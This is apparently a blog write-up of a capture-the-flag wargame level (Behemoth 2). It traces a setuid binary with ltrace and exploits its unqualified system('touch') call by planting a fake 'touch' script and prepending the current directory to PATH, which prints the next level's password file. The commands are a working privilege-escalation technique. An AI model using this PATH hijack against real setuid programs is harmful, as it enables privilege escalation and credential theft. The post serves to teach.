behemoth2@behemoth$ /behemoth/behemoth2 touch: cannot touch '6014': Permission denied
It executes "touch 6014" but failes with permission denied and then pauses for long time.
Let's create a temporary folder in /tmp, move to it, then execute the vulnerable file with ltrace:
behemoth2@behemoth$ mkdir /tmp/b2z behemoth2@behemoth$ cd /tmp/b2z behemoth2@behemoth:/tmp/b2z$ ltrace /behemoth/behemoth2 __libc_start_main(0x804856b, 1, 0xffffd774, 0x8048660 <unfinished ...> getpid() = 6018 sprintf("touch 6018", "touch %d", 6018) = 10 __lxstat(3, "6018", 0xffffd640) = -1 unlink("6018") = -1 geteuid() = 13002 geteuid() = 13002 setreuid(13002, 13002) = 0 system("touch 6018" <no return ...> --- SIGCHLD (Child exited) --- <... system resumed> ) = 0
It looks into current dir for existance of a file with the name of the PID (6018)
If the file exists then remove it.
Then elevates privileges and the execute "touch 6018" via system()
Well, we could try to create a script that prints the content of password file and name it "touch".
Then add current directory to PATH and run again the vulnerable code
behemoth2@behemoth:/tmp/b2z$ cat > touch #!/bin/sh cat /etc/behemoth_pass/behemoth3 ^C behemoth2@behemoth:/tmp/b2z$ chmod +x touch behemoth2@behemoth:/tmp/b2z$
behemoth2@behemoth:/tmp/b2z$ PATH=.:$PATH behemoth2@behemoth:/tmp/b2z$ /behemoth/behemoth2 n******l
Pretty easy, isn't it?
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.